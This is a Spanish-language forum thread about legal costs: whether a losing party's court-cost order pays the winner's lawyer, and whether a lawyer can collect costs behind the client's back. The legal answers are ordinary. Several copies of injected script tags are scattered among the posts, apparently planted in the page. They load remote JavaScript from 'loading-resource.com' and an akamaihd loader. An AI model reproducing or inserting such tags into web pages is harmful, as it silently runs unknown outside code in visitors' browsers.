¿Quién paga los honorarios de mi abogado, si ganamos el pleito?

Os quería preguntar, si en la sentencia pone que la parte contraria está condenada a pagar las costas de juicio, ¿esto significa que pagan los gastos de los honorarios de mi abogado?... O mi abogado tiene que cobrar por las dos partes<<<<<' una por medio de la sentencia favorable a nosotros y otra por mi parte, con el porcentaje que habíamos acordado en caso de ganar. Un saludo y muchas gracias.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

2 Respuestas

Respuesta

Se parte de la base de que cada cliente, salvo pactos particulares, abona a sus respectivos abogados y procuradores sus honorarios.

Posteriormente y con la sentencia, condena en costas significa que la parte vencida en litigio habrá de abonar no sólo los honorarios de su representación, sino también los de la representación del vencedor.

Para efectuar el cobro, su abogado se comunicaría con el letrado contrario procurando un pago amistoso de las costas. De no haber conformidad, su abogado deberá instar un nuevo procedimiento ante el Secretario Judicial denominado "Tasación de Costas". En él, su abogado y procurador presentarían sus minutas de honorarios y la Hoja de Encargo (acuerdo escrito entre usted y el letrado) pudiendo la otra parte mostrar su conformidad o impugnarlos. La cuestión se resolverá por el Secretario mediante Decreto.

Posteriormente, una vez cobradas las costas, lo normal es que a usted se le devuelvan los gastos efectuados hasta el momento, pero todo dependerá del acuerdo al que llegara con su abogado y de los honorarios devengados (debidos) y aún no abonados por usted (si los hubiera, claro está).

Un saludo.

AVISO: estos consejos son meramente orientativos y limitados. Las consultas pueden adolecer de falta de detalles trascendentales. No se han examinado documentos ni atendido personalmente. Si fuera necesario, póngase en contacto con un abogado de su entorno más cercano. Confíe en los abogados.

Te agradezco tu respuesta es muy clara y precisa,pero te voy a preguntar algo mas.En mi acuerdo con el abogado,pactamos que se llevaría un porcentaje de lo que sacáramos de la indemnización,(estaba muy claro que era ganado de antemano, un despido improcedente). Si en la sentencia condenan a la otra parte a pagar las costas de juicio. Mi pregunta es: ¿puede mi abogado pedir para si mismo este beneficio sin yo enterarme?.¿como puedo hacer para saber si esta haciendo a mis espaldas la petición de estos honorarios,mas luego cobrarme a mi el porcentaje convenido?.¿esto es legal?.No me tiene al día del proceso. Ayudame por favor...tengo algunas dudas sobre su proceder,...no quiero que me tome el pelo con los honorarios.muchísimas gracias de corazón.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862">// <![CDATA[TE// ]]></script>

Los abogados estamos obligados a informar a nuestros clientes del devenir de los procesos en cuanto se nos pida información, o siempre que sea necesario. Usted tiene derecho a exigir dicha información, y puede poner en conocimiento del Colegio de Abogados correspondiente cualquier infracción.

Una matización: la condena en costas no es un beneficio, más aún cuando en la mayoría de los casos el perdedor del pleito no las paga voluntariamente, obligando al letrado de la parte vencedora a instar un nuevo procedimiento (el de tasación). Además puede seguir sin pagar, por lo que el letrado tendría que instar una ejecución (otro procedimiento). En definitiva, no siempre es tan sencillo cobrar unas costas. Muchas veces nos exige más esfuerzo y tiempo que el pleito principal.

E insisto, tenga en cuenta que Ud. debe pagar los honorarios que previamente pactó, pues el cobro por su abogado es independiente a que consiga o no el cobro de las costas, ya que el trabajo encargado ha sido efectivamente realizado.

Dudo que su letrado trate de cobrarlas a sus espaldas si no es para luego rendir cuentas pues, insisto, se arriesgaría a importantes sanciones. Para saber si está tratando de cobrar las costas, sólo puedo recomendarle dos vías: preguntar a aquél a quien ganó el juicio o, lo más normal, preguntar a su abogado.

Un saludo y suerte.

muchísimas gracias por resolverme las dudas.excelente tu respuesta.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Respuesta

Me gastaría que me informaran, he ganado juicio y tngo sentencia favorable, y a la otra parte la condenaron a 6000 e en costas, ¿yo de ese dinero me corresponde algo? Y mi abogado en cuanto k firmemos le tengo que dar sus honorarios y 1000 euros que se a tenido que poner para que todo siguiera adelante, ¿tengo qué pagar tb a mi abogado? ¿Y los 1000 que puse pa gastos no se me devuel e?